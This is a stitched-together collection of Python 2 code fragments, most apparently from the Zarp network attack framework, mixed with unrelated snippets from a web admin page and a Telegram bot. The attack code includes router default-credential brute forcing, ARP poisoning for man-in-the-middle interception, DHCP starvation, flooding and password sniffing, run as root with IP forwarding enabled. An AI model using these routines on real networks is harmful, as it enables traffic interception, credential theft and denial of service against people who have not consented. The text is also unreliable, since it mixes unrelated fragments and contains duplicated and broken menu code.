def attempt_login(self, brand):
""" Attempts to login to the router with default credentials. This will
only work with routers that use HTTP basic auth.
brand is the type of router being hit.
Useful for vulnerabilities that require authentication.
"""
try:
Msg('Attempting to discover credentials for %s...' % self.ip)
wordlist = default_list(brand)
for username in wordlist['username']:
for password in wordlist['password']:
# look for a 200
auth_string = b64encode('%s:%s' % (username, password))
opener = urllib2.build_opener()
opener.addheaders.append(
('Authorization', 'Basic %s' % auth_string))
try:
response = opener.open('http://%s/' % self.ip)
if response.getcode() is 200:
Msg('Credentials found - %s:%s' %
(username, password))
return
except urllib2.HTTPError, e:
if e.code is 401:
pass
Msg('No credentials found.')
def initialize(self):
"""Initialize the ARP spoofer
"""
self.victim = (self.config['to_ip'].value,
getmacbyip(self.config['to_ip'].value))
if self.config['from_ip'].value is None:
# Enumerate all IPs in network
Msg("Gathering information on network...this may take a minute")
thread_pool = ThreadPool(processes=25)
ip_whitelist = {self.victim[0], self.local[0]}
for ip, mac in thread_pool.imap_unordered(
arp.get_mac_address_for_ip,
(ip for ip in self.enumerate_all_ips_in_network(
self.config['to_ip'].value, self.get_iface_netmask()))):
if ip in ip_whitelist:
continue
if mac is None or mac == "ff:ff:ff:ff:ff:ff":
# no mac for you, next!
continue
self.targets[ip] = mac
# todo Consider adding an upper limit on hosts being poisoned
elif "/" in self.config['from_ip'].value:
source_ip, netmask = self.cidr_to_ip_and_netmask(
self.config['from_ip'].value)
# Enumerate all IPs in network
Msg("Gathering information on network...this may take a minute")
thread_pool = ThreadPool(processes=25)
ip_whitelist = {self.victim[0], self.local[0]}
for ip, mac in thread_pool.imap_unordered(
arp.get_mac_address_for_ip,
(ip for ip in self.enumerate_all_ips_in_network(
source_ip, netmask))):
if ip in ip_whitelist:
continue
if mac is None or mac == "ff:ff:ff:ff:ff:ff":
# no mac for you, next!
continue
self.targets[ip] = mac
# todo Consider adding an upper limit on hosts being poisoned
else:
self.targets[self.config['from_ip'].value] = getmacbyip(
self.config['from_ip'].value)
Msg("Initializing ARP poison...")
return self.initialize_post_spoof()
def handle_ip_packet(self, pkt):
try:
if IP in pkt and Ether in pkt:
ip = pkt[IP].src
mac = pkt[Ether].src
if ip not in self.targets and mac != "ff:ff:ff:ff:ff:ff" and ip != self.local[0] \
and ip != self.victim[0] and ip != "0.0.0.0":
raw_ip = struct.unpack("!L", socket.inet_aton(ip))[0]
if (self.sample_int
& self.raw_netmask) == (raw_ip & self.raw_netmask):
self.targets[ip] = mac
target = (ip, mac)
Msg("Poisoning {0} <---> {1}".format(
self.victim[0], target[0]))
victim_thread = Thread(target=self.respoofer,
args=(target, self.victim))
victim_thread.daemon = True
victim_thread.start()
# send ARP replies to spoofed address
target_thread = Thread(target=self.respoofer,
args=(self.victim, target))
target_thread.daemon = True
target_thread.start()
if ARP in pkt and Ether in pkt and pkt[ARP].op in (1, 2):
ip = pkt[ARP].psrc
mac = pkt[Ether].src
if ip not in self.targets and mac != "ff:ff:ff:ff:ff:ff" and ip != self.local[0] \
and ip != self.victim[0] and ip != "0.0.0.0":
raw_ip = struct.unpack("!L", socket.inet_aton(ip))[0]
if (self.sample_int
& self.raw_netmask) == (raw_ip & self.raw_netmask):
self.targets[ip] = mac
target = (ip, mac)
Msg("Poisoning {0} <---> {1}".format(
self.victim[0], target[0]))
victim_thread = Thread(target=self.respoofer,
args=(target, self.victim))
victim_thread.daemon = True
victim_thread.start()
# send ARP replies to spoofed address
target_thread = Thread(target=self.respoofer,
args=(self.victim, target))
target_thread.daemon = True
target_thread.start()
except Exception, j:
Error('Error with ARP poisoner: %s' % j)
self.running = False
def initialize(self):
""" initialize sniffer """
self.sniff_filter = "src %s" % self.config['target'].value
print self.sniff_filter
self.run()
Msg("Starting password sniffer...")
return True
def initialize(self):
Msg('Beginning DHCP starvation...')
conf.checkIPaddr = False
thread = Thread(target=self.starve)
self.running = True
thread.start()
return True
def initialize_post_spoof(self):
""" Separated from mainline initialization so we can run this post-var
configuration. If you're calling this, BE SURE to set up the required
variables first!
"""
try:
# get mac addresses for both victims
self.to_mac = getmacbyip(self.to_ip)
self.from_mac = getmacbyip(self.from_ip)
# send ARP replies to victim
debug('Beginning ARP spoof to victim...')
victim_thread = Thread(target=self.respoofer, args=(self.from_ip, self.to_ip))
victim_thread.start()
# send ARP replies to spoofed address
target_thread = Thread(target=self.respoofer, args=(self.to_ip, self.from_ip))
target_thread.start()
self.spoofing = True
except KeyboardInterrupt:
Msg('Closing ARP poison down...')
self.spoofing = False
return None
except TypeError, t:
Error('Type error: %s'%t)
self.spoofing = False
return None
def on_message(self, msg):
msg = Msg.fromJSON(msg)
try:
self.handleMessage(msg)
except SoftFailure, e:
self.send(json.dumps({"type": "error",
"message": e.message}))
def handle(path, form, start_response):
# import cgitb
# cgitb.enable()
err = Msg(web=True)
planet_subdir = path.split(os.sep)[-2]
from planet import Planet
planet = Planet(direc=planet_subdir)
## Handle form input
if form.has_key('PlanetName'):
orig_pass = planet.password
planet = update_config(planet, form, err)
if form.getvalue('Timestamp') != str(planet.last_config_change):
err.add("Admin page has expired! Perhaps somebody else is " +
"editing this planet at the same time as you? Please " +
"reload this page and try again.")
#if debug: err.add("%s != %s" % (form.getvalue('Timestamp'), planet.last_config_change))
elif form.getvalue('Pass','') == '':
err.add("Please enter your password at the bottom of the page.")
elif form.getvalue('Pass') != orig_pass:
err.add("Invalid password")
else:
planet.save(update_config_timestamp=True)
## Template
from templates import Admin
start_response("200 OK", [('Content-Type', 'text/html')])
a = Admin(template_vars(err, planet, form)).render()
return [a]
def view_session(module, number):
"""Initializes a module's view
@param module is the module number
@param number is the session number
"""
global HOUSE
mod = get_module(module, number)
if hasattr(mod, 'view'):
Msg('[enter] when finished')
mod.view()
def handle(path, form, start_response):
err = Msg(web=True)
subdir = form.getvalue("subdirectory", '').lower()
log.debug("form keys and vals: %s" % (dict([(k,form.getvalue(k,'')) for k in form.keys()])))
if 'submit' in form.keys():
if form.getvalue("turing",'').lower() != "yes":
err.add("I can't believe you failed the Turing test. Maybe you're a sociopath?")
log.debug("Turing test failed for %s" % subdir)
elif validate_input(subdir, err):
if make_planet(subdir, err):
response_headers = [('Location', "http://%s/%s/admin.py" % (opt['domain'], subdir))]
start_response("302 Found", response_headers)
return []
response_headers = [('Content-type', 'text/html')]
start_response("200 OK", response_headers)
doc = template_vars(err, subdir, dict([(k,form.getvalue(k,'')) for k in form.keys()]))
log.debug("doc: %s" % doc)
return([templates.Index(doc).render().encode('utf-8', 'ignore')])
def initialize(self):
"""Initialize the ARP spoofer
"""
try:
Msg('[!] Using interface [%s:%s]'%(config.get('iface'), self.local_mac))
# get ip addresses from user
self.to_ip = raw_input("[!] Enter host to poison:\t")
self.from_ip = raw_input("[!] Enter address to spoof:\t")
tmp = raw_input("[!] Spoof IP {0} from victim {1}. Is this correct? ".format(self.to_ip, self.from_ip))
except KeyboardInterrupt:
return None
except Exception, j:
debug('Error loading ARP poisoning module: %s'%(j))
return None
def initialize_post_spoof(self):
""" Separated from mainline initialization so we can run this post-var
configuration. If you're calling this, BE SURE to set up the required
variables first!
"""
try:
if self.config['from_ip'].value is None or "/" in self.config[
'from_ip'].value:
sniff_thread = Thread(target=self.sniffer_thread)
sniff_thread.daemon = True
sniff_thread.start()
# send ARP replies to victim
debug('Beginning ARP spoof to victim...')
self.running = True
for key in self.targets.keys():
target = (key, self.targets[key])
Msg("Poisoning {0} <---> {1}".format(self.victim[0],
target[0]))
victim_thread = Thread(target=self.respoofer,
args=(target, self.victim))
victim_thread.daemon = True
victim_thread.start()
# send ARP replies to spoofed address
target_thread = Thread(target=self.respoofer,
args=(self.victim, target))
target_thread.daemon = True
target_thread.start()
except KeyboardInterrupt:
Msg('Closing ARP poison down...')
self.running = False
return None
except TypeError, t:
Error('Type error: %s' % t)
self.running = False
return None
def initialize(self):
tmp = raw_input(
'[!] Are you sure you want to DHCP starve the gateway? ')
if 'n' in tmp.lower():
return
print '[!] Beginning DHCP starvation...'
conf.checkIPaddr = False
try:
pkt = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff") / IP(
src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67) / BOOTP(
chaddr=RandString(12, '0123456789abcdef'))
pkt /= DHCP(options=[("message-type", 'discover'), 'end'])
sendp(pkt, loop=1)
except KeyboardInterrupt, Exception:
Msg('[!] Shutting down DoS...')
def shutdown(self):
""" Shutdown the ARP spoofer
"""
if not self.spoofing:
return
Msg("Initiating ARP shutdown...")
debug('initiating ARP shutdown')
self.spoofing = False
# rectify the ARP caches
sendp(Ether(dst=self.to_mac,src=self.from_mac)/ARP(op='who-has',
psrc=self.from_ip, pdst=self.to_ip),
inter=1, count=3)
sendp(Ether(dst=self.from_mac,src=self.to_mac)/ARP(op='who-has',
psrc=self.to_ip,pdst=self.from_ip),
inter=1, count=3)
debug('ARP shutdown complete.')
return True
def shutdown(self):
""" Shutdown the ARP spoofer
"""
if not self.running:
return
Msg("Initiating ARP shutdown...")
debug('initiating ARP shutdown')
self.running = False
time.sleep(2) # give it a sec for the respoofer
# rectify the ARP caches
sendp(Ether(dst=self.victim[1], src=self.target[1]) /
ARP(op='who-has', psrc=self.target[0], pdst=self.victim[0]),
count=1)
sendp(Ether(dst=self.target[1], src=self.victim[1]) /
ARP(op='who-has', psrc=self.victim[0], pdst=self.target[0]),
count=1)
debug('ARP shutdown complete.')
return True
def display_options(options, settings):
""" Given a module's options and the column
headers, generate a table, print it, and return
the completed table.
"""
table = []
for (idx, opt) in enumerate(options.keys()):
tmp = []
tmp.append(idx + 1)
tmp.append(options[opt].display)
tmp.append(options[opt].getStr())
tmp.append(options[opt].type)
tmp.append(options[opt].required)
table.append(tmp)
if len(table) > 0:
config.pptable([settings] + table)
else:
Msg('\tModule has no options.')
print color.B_YELLOW + '0' + color.B_GREEN + ') ' + color.B_WHITE + 'Back' + color.END
return table
class arp(Poison):
"""ARP spoofing class
"""
def __init__(self):
# keep scapy quiet
conf.verb = 0
# tuples (ip,mac)
self.local = (config.get('ip_addr'),
get_if_hwaddr(config.get('iface')))
self.victim = ()
self.target = ()
super(arp, self).__init__('ARP Spoof')
def initialize(self):
"""Initialize the ARP spoofer
"""
try:
Msg('Using interface [%s:%s]' %
(config.get('iface'), self.local[1]))
# get ip addresses from user
to_ip = raw_input("[!] Enter host to poison:\t")
from_ip = raw_input("[!] Enter address to spoof:\t")
tmp = raw_input(
"[!] Spoof IP {0} from victim {1}. Is this correct? [Y/n]".
format(to_ip, from_ip))
self.victim = (to_ip, getmacbyip(to_ip))
self.target = (from_ip, getmacbyip(from_ip))
except KeyboardInterrupt:
return None
except Exception, j:
debug('Error loading ARP poisoning module: %s' % (j))
return None
if "n" in tmp.lower():
return
Msg("Initializing ARP poison...")
return self.initialize_post_spoof()
class arp(Poison):
"""ARP spoofing class
"""
def __init__(self):
# keep scapy quiet
conf.verb = 0
# addresses
self.local_mac = get_if_hwaddr(config.get('iface'))
self.local_ip = ''
self.to_ip = ''
self.from_ip = ''
self.from_mac = None
self.to_mac = None
# flag for spoofing
self.spoofing = False
super(arp,self).__init__('ARP Spoof')
def initialize(self):
"""Initialize the ARP spoofer
"""
try:
Msg('[!] Using interface [%s:%s]'%(config.get('iface'), self.local_mac))
# get ip addresses from user
self.to_ip = raw_input("[!] Enter host to poison:\t")
self.from_ip = raw_input("[!] Enter address to spoof:\t")
tmp = raw_input("[!] Spoof IP {0} from victim {1}. Is this correct? ".format(self.to_ip, self.from_ip))
except KeyboardInterrupt:
return None
except Exception, j:
debug('Error loading ARP poisoning module: %s'%(j))
return None
if "n" in tmp.lower():
return
Msg("[!] Initializing ARP poison...")
return self.initialize_post_spoof()
def view(self):
""" ARP poisoner doesnt have a view, yet.
"""
Msg('No view for ARP poison. Enable a sniffer for detailed analysis.')
return
def main():
""" Zarp entry point
"""
# set up configuration
config.initialize()
# set up database
database.initialize()
# load modules
loader = LoadedModules()
loader.load()
Msg('Loaded %d modules.' % loader.total)
# handle command line options first
if len(argv) > 1:
parse_cmd.parse(argv, loader)
# menus
main_menu = [
'Poisoners', 'DoS Attacks', 'Sniffers', 'Scanners', 'Parameter',
'Services', 'Attacks', 'Sessions'
]
running = True
choice = -1
while running:
header()
choice = print_menu(main_menu)
if choice == 0:
# check if they've got running sessions!
cnt = stream.get_session_count()
if cnt > 0:
choice = raw_input(
color.YELLOW +
'You have %d sessions running. Are you sure? [Y/n] ' %
cnt + color.END)
if 'y' in choice.lower() or choice == '':
Msg('Shutting all sessions down...')
stream.stop_session('all', -1)
running = False
# recheck that all sessions are down
cnt = stream.get_session_count()
if cnt <= 0:
# some libs dont clean up their own threads, so
# we need to hard quit those to avoid hanging; FIXME
_exit(1)
else:
debug("Exiting with session count: %d" % (cnt))
Msg("Exiting...")
running = False
elif choice == 1:
while True:
choice = print_menu([x().which for x in loader.poison])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.poison):
continue
else:
stream.initialize(loader.poison[choice - 1])
elif choice == 2:
while True:
choice = print_menu([x().which for x in loader.dos])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.dos):
continue
else:
stream.initialize(loader.dos[choice - 1])
elif choice == 3:
while True:
choice = print_menu([x().which for x in loader.sniffers])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.sniffers):
continue
else:
stream.initialize(loader.sniffers[choice - 1])
elif choice == 4:
while True:
choice = print_menu([x().which for x in loader.scanner])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.scanner):
continue
else:
stream.initialize(loader.scanner[choice - 1])
elif choice == 5:
while True:
choice = print_menu([x().which for x in loader.parameter])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.parameter):
continue
else:
stream.initialize(loader.parameter[choice - 1])
elif choice == 6:
while True:
choice = print_menu([x().which for x in loader.services])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.services):
continue
else:
stream.initialize(loader.services[choice - 1])
elif choice == 7:
while True:
choice = print_menu([x().which for x in loader.attacks])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.attacks):
continue
else:
stream.initialize(loader.attacks[choice - 1])
elif choice == 8:
session_manager.menu()
elif choice == -1:
pass
def main():
""" Zarp entry point
"""
# handle command line options first
if len(sys.argv) > 1:
parse_cmd.parse(sys.argv)
# set up configuration
config.initialize()
# menus
main_menu = [
'Poisoners', 'DoS Attacks', 'Sniffers', 'Scanners', 'Parameter',
'Services', 'Sessions'
]
# load modules
loader = LoadedModules()
loader.load()
Msg('Loaded %d modules.' % loader.total)
running = True
choice = -1
while running:
header()
choice = print_menu(main_menu)
if choice == 0:
# check if they've got running sessions!
cnt = stream.get_session_count()
if cnt > 0:
Msg('You have %d sessions running. Are you sure?' % cnt)
choice = raw_input('> ')
if 'y' in choice.lower():
Msg('Shutting all sessions down...')
stream.stop_session('all', -1)
running = False
else:
debug("Exiting with session count: %d" % (cnt))
Msg("Exiting...")
running = False
elif choice == 1:
while True:
choice = print_menu([x().which for x in loader.poison])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.poison):
continue
else:
stream.initialize(loader.poison[choice - 1], 'POISON')
elif choice == 2:
while True:
choice = print_menu([x().which for x in loader.dos])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.dos):
continue
else:
stream.initialize(loader.dos[choice - 1], 'DOS')
elif choice == 3:
while True:
choice = print_menu([x().which for x in loader.sniffers])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.sniffers):
continue
else:
stream.initialize(loader.sniffers[choice - 1], 'SNIFFER')
elif choice == 4:
while True:
choice = print_menu([x().which for x in loader.scanner])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.scanner):
continue
else:
stream.initialize(loader.scanner[choice - 1], 'SCANNER')
elif choice == 5:
while True:
choice = print_menu([x().which for x in loader.parameter])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.parameter):
continue
else:
stream.initialize(loader.parameter[choice - 1],
'PARAMETER')
elif choice == 6:
while True:
choice = print_menu([x().which for x in loader.services])
if choice == 0:
break
elif choice == -1:
pass
elif choice > len(loader.services):
continue
else:
stream.initialize(loader.services[choice - 1], 'SERVICE')
elif choice == 7:
session_manager.menu()
elif choice == -1:
pass
break
elif choice == -1:
pass
elif choice > len(loader.services):
continue
else:
stream.initialize(loader.services[choice - 1], 'SERVICE')
elif choice == 7:
session_manager.menu()
elif choice == -1:
pass
# Application entry; dependency checks, etc.
if __name__ == "__main__":
# perm check
if int(os.getuid()) > 0:
Error('Please run as root.')
sys.exit(1)
# check for forwarding
if not getoutput('cat /proc/sys/net/ipv4/ip_forward') == '1':
Msg('IPv4 forwarding disabled. Enabling..')
tmp = getoutput(
'sudo sh -c \'echo "1" > /proc/sys/net/ipv4/ip_forward\'')
if len(tmp) > 0:
Error('Error enabling IPv4 forwarding.')
sys.exit(1)
# load local scapy lib
sys.path[:0] = [str(os.getcwd()) + '/scapy']
main()
def handle_opts(module):
""" The user has selected a module, so we should parse out all the
options for this particular module, set the config, and when
requested, run it. This is kinda messy, but works for now.
"""
# fetch generic module options and module-specific options
options = module.config
# dump module settings
Setting = ['', 'Option', 'Value', 'Type', 'Required']
table = display_options(options, Setting)
while True:
# fetch command/option
try:
choice = raw_input('%s > ' %
(color.B_WHITE + module.which + color.END))
# first check global commands
tmp = check_opts(choice)
if tmp == -1:
continue
# check module commands
if choice is "0":
return False
elif choice == "info":
if module.info is None:
Msg("Module has no information available")
continue
print '%s%s%s' % (color.GREEN, '-' * len(
module.info.split('\n')[1].strip()), color.END),
print dedent(module.info.rstrip())
print '%s%s%s' % (color.GREEN, '-' * len(
module.info.split('\n')[1].strip()), color.END)
elif choice == "ops":
display_options(options, Setting)
continue
elif len(choice.split(' ')) > 1:
choice = choice.split(' ')
try:
if int(choice[0]) > len(table):
continue
elif int(choice[0]) is 0:
return False
key = options.keys()[int(choice[0]) - 1]
if choice[1] == 'o' and module.config[key].opts is not None:
Msg("Options: %s" % module.config[key].opts)
continue
elif choice[1] == 'o' and module.config[key].type == 'list':
Msg('%s' % module.config[key].value)
continue
# generate a temporary zoption
tmp = copy(module.config[key])
tmp.value = ' '.join(choice[1::])
# we've got a valid number, validate the type and set it
if not tmp.validate():
Error(
'Wrong type assigned. Expected value of type "%s"'
% options[key].type)
else:
module.config[key] = tmp
except Exception, e:
Error('%s' % e)
continue
elif "r" in choice.lower() or "run" in choice.lower():
# verify all required options are set
for opt in options.keys():
if options[opt].required and options[opt].value is None:
Error('Option \'%s\' is required.' % opt)
raise FailedCheck
return True
def initialize(self):
Msg('Flooding \'%s\'...' % self.config['target'].value)
thread = Thread(target=self.flood)
self.running = True
thread.start()
return True
for update in updates: update=update update_id = update.update_id + 1; theMenu = Menu() vocab = Phrase() chat_id = update.message.chat.id msgTxt = update.message.text.lower() msgTokens = msgTxt.split(u'\s,;.:!?¡¿+-*/="\'\\') msgSender = update.message.sender.first_name.lower() msg = Msg(chat_id, msgTxt, msgTokens, msgSender) startupGreeting(msg) while(True): try: time.sleep(1.1) updates = bot.get_updates(update_id).wait() while(updates == []): checkNewYear() time.sleep(1.1) updates = bot.get_updates().wait() update = max(updates, key=lambda x:x.update_id) update_id = update.update_id + 1;